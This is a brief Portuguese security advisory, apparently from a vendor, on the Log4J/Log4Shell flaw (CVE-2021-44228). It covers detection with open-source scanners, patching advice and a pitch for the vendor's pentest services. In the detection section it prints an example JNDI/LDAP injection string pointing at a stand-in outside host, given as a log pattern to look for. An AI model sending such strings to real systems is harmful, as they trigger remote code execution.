Apache Log4J
Log4J (CVE-2021-44228) é uma vulnerabilidade e é marcada com a gravidade mais alta (10 de 10). Ele permite que um invasor execute código arbitrário injetando dados controlados pelo invasor em uma mensagem registrada que é amplamente usada e uma função de registro popular. Mesmo que seu software não a utilize, um fornecedor terceirizado ou um componente de seu software pode usar a biblioteca.
Detecção:
Faça você mesmo: já existem scanners de código aberto disponíveis.
Determine o potencial comprometimento: Revise seus logs e procure algo assim: ${jndi:ldap://notyourdomain.com/xxxxxxxx}. Revise os servidores e identifique quaisquer processos que não sejam normais.
https://github.com/fullhunt/log4j-scan https://pythonrepo.com/repo/fullhunt-log4j-scan https://github.com/fullhunt/log4j-scan
Resposta: Nós podemos ajudar Nossa proteção da Web inclui o Log4J em sites externos. Se você precisar de mais, oferecemos pentests externos ou soluções personalizadas para ajudar a verificar e detectar essas vulnerabilidades de todos os seus sistemas externos e/ou internos.
Não hesite em nos contatar agora antes que os antiéticos hackers o encontrem. Nossos testes de intrusão identificam a exposição a vulnerabilidades de dia zero, configurações incorretas e processos inadequados de gerenciamento de patches.
O que você pode fazer? É altamente recomendável atualizar a biblioteca ou removê-la de sistemas que não são necessários. Existem outros métodos para auxiliar na correção, dependendo da versão. Revise nossas referências para entender melhor a vulnerabilidade e como corrigi-la em seu ambiente.
Referências
https://blog.shodanhdb.com/log4j-vulnerability https://claroty.com/2021/12/14/blog-research-what-you-need-to-know-about-the-log4j-zero-day-vulnerability/ https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/ https://www.techspot.com/news/92633-hackers-launch-over-840000-attacks-through-log4j-flaw.html